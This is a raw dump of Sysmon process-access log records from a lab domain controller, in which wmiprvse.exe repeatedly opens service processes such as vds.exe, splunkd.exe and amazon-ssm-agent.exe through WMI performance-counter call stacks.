13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 